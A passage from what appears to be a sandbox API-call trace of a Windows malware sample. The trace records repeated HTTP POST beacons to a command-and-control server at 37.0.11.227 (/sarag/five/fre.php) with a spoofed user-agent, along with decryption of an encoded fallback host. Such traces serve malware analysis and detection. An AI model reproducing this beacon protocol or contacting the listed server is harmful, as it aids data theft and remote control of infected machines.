ai_next=0x0)) returned 0 [0328.777] GetProcessHeap () returned 0x690000 [0328.777] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab420 [0328.777] socket (af=2, type=1, protocol=6) returned 0xb80 [0328.778] connect (s=0xb80, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0328.804] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0328.804] GetProcessHeap () returned 0x690000 [0328.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aef68 [0328.804] GetProcessHeap () returned 0x690000 [0328.804] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0328.805] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.806] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0328.806] GetProcessHeap () returned 0x690000 [0328.806] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6af740 [0328.806] GetProcessHeap () returned 0x690000 [0328.806] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.807] GetProcessHeap () returned 0x690000 [0328.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0328.807] GetProcessHeap () returned 0x690000 [0328.807] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0328.807] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0328.808] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0328.808] GetProcessHeap () returned 0x690000 [0328.808] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0328.808] GetProcessHeap () returned 0x690000 [0328.808] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0328.808] send (s=0xb80, buf=0x6ad508*, len=242, flags=0) returned 242 [0328.809] send (s=0xb80, buf=0x6aba40*, len=159, flags=0) returned 159 [0328.810] GetProcessHeap () returned 0x690000 [0328.810] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0328.810] recv (in: s=0xb80, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0328.891] GetProcessHeap () returned 0x690000 [0328.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0328.891] GetProcessHeap () returned 0x690000 [0328.891] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0328.891] GetProcessHeap () returned 0x690000 [0328.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af740 | out: hHeap=0x690000) returned 1 [0328.892] GetProcessHeap () returned 0x690000 [0328.892] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aef68 | out: hHeap=0x690000) returned 1 [0328.892] closesocket (s=0xb80) returned 0 [0328.893] GetProcessHeap () returned 0x690000 [0328.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab420 | out: hHeap=0x690000) returned 1 [0328.893] GetProcessHeap () returned 0x690000 [0328.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0328.893] GetProcessHeap () returned 0x690000 [0328.893] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0328.893] GetProcessHeap () returned 0x690000 [0328.894] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0328.894] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18cc) returned 0xb80 [0328.895] Sleep (dwMilliseconds=0xea60) [0328.897] GetProcessHeap () returned 0x690000 [0328.897] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0328.897] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.897] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.902] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.902] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeee0) returned 1 [0328.907] GetProcessHeap () returned 0x690000 [0328.908] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0328.908] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.908] CryptImportKey (in: hProv=0x6aeee0, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.909] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.909] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.910] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.910] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.910] GetProcessHeap () returned 0x690000 [0328.910] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0328.911] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.920] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0328.920] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.921] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.922] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.922] CryptReleaseContext (hProv=0x6aeee0, dwFlags=0x0) returned 1 [0328.922] GetProcessHeap () returned 0x690000 [0328.922] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x6a9f58 [0328.923] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.923] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0328.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.924] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0328.924] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.925] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0328.925] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.926] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0328.926] GetProcessHeap () returned 0x690000 [0328.926] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0328.926] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0328.927] GetProcessHeap () returned 0x690000 [0328.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0328.927] GetProcessHeap () returned 0x690000 [0328.927] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a9f58 | out: hHeap=0x690000) returned 1 [0328.928] GetProcessHeap () returned 0x690000 [0328.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0328.928] GetProcessHeap () returned 0x690000 [0328.928] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0328.929] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.929] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0328.945] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.945] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0328.953] GetProcessHeap () returned 0x690000 [0328.954] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0328.954] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.955] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0328.955] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.956] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0328.957] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.957] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0328.957] GetProcessHeap () returned 0x690000 [0328.958] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0328.959] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.959] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0328.960] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.960] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0328.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0328.961] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0328.961] GetProcessHeap () returned 0x690000 [0328.961] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0328.973] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.973] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0328.974] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.974] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0328.975] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.976] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0328.976] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0328.977] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0328.977] GetProcessHeap () returned 0x690000 [0328.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0328.977] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0328.977] GetProcessHeap () returned 0x690000 [0328.977] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab480 [0328.977] socket (af=2, type=1, protocol=6) returned 0xb84 [0328.978] connect (s=0xb84, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0329.004] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0329.004] GetProcessHeap () returned 0x690000 [0329.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0329.004] GetProcessHeap () returned 0x690000 [0329.004] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0329.005] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.006] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0329.006] GetProcessHeap () returned 0x690000 [0329.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0329.006] GetProcessHeap () returned 0x690000 [0329.006] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.006] GetProcessHeap () returned 0x690000 [0329.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0329.006] GetProcessHeap () returned 0x690000 [0329.006] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6cd7d8 [0329.007] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.009] wvsprintfA (in: param_1=0x6cd7d8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0329.009] GetProcessHeap () returned 0x690000 [0329.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0329.009] GetProcessHeap () returned 0x690000 [0329.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6cd7d8 | out: hHeap=0x690000) returned 1 [0329.010] send (s=0xb84, buf=0x6ad508*, len=242, flags=0) returned 242 [0329.011] send (s=0xb84, buf=0x6aba40*, len=159, flags=0) returned 159 [0329.011] GetProcessHeap () returned 0x690000 [0329.011] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0329.011] recv (in: s=0xb84, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0329.090] GetProcessHeap () returned 0x690000 [0329.090] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0329.090] GetProcessHeap () returned 0x690000 [0329.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0329.091] GetProcessHeap () returned 0x690000 [0329.091] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0329.091] GetProcessHeap () returned 0x690000 [0329.092] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0329.093] closesocket (s=0xb84) returned 0 [0329.094] GetProcessHeap () returned 0x690000 [0329.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab480 | out: hHeap=0x690000) returned 1 [0329.094] GetProcessHeap () returned 0x690000 [0329.094] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.094] GetProcessHeap () returned 0x690000 [0329.095] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0329.096] GetProcessHeap () returned 0x690000 [0329.096] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0329.096] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18d0) returned 0xb84 [0329.098] Sleep (dwMilliseconds=0xea60) [0329.100] GetProcessHeap () returned 0x690000 [0329.100] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0329.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.101] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0329.139] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.140] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0329.145] GetProcessHeap () returned 0x690000 [0329.145] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0329.146] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.146] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0329.147] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.147] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0329.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.150] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.150] GetProcessHeap () returned 0x690000 [0329.150] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0329.423] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.424] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0329.424] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.425] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0329.425] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.426] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0329.426] GetProcessHeap () returned 0x690000 [0329.426] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0329.426] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.427] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0329.427] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.427] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0329.428] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.428] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0329.429] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.429] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0329.429] GetProcessHeap () returned 0x690000 [0329.429] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0329.429] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0329.429] GetProcessHeap () returned 0x690000 [0329.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0329.430] GetProcessHeap () returned 0x690000 [0329.430] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0329.431] GetProcessHeap () returned 0x690000 [0329.431] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0329.431] GetProcessHeap () returned 0x690000 [0329.431] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0329.432] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.432] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0329.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.441] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0329.449] GetProcessHeap () returned 0x690000 [0329.449] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0329.449] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.450] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0329.451] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.451] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0329.452] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.452] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0329.452] GetProcessHeap () returned 0x690000 [0329.452] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0329.493] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.493] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0329.494] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.495] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0329.495] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0329.496] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0329.496] GetProcessHeap () returned 0x690000 [0329.496] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0329.497] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.497] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0329.498] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.498] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0329.499] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.499] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0329.500] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0329.501] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0329.501] GetProcessHeap () returned 0x690000 [0329.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0329.501] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0329.501] GetProcessHeap () returned 0x690000 [0329.501] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4b0 [0329.501] socket (af=2, type=1, protocol=6) returned 0xb88 [0329.501] connect (s=0xb88, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0329.526] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0329.526] GetProcessHeap () returned 0x690000 [0329.526] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aedd0 [0329.527] GetProcessHeap () returned 0x690000 [0329.527] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6cd7d8 [0329.527] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0329.528] wvsprintfA (in: param_1=0x6cd7d8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; 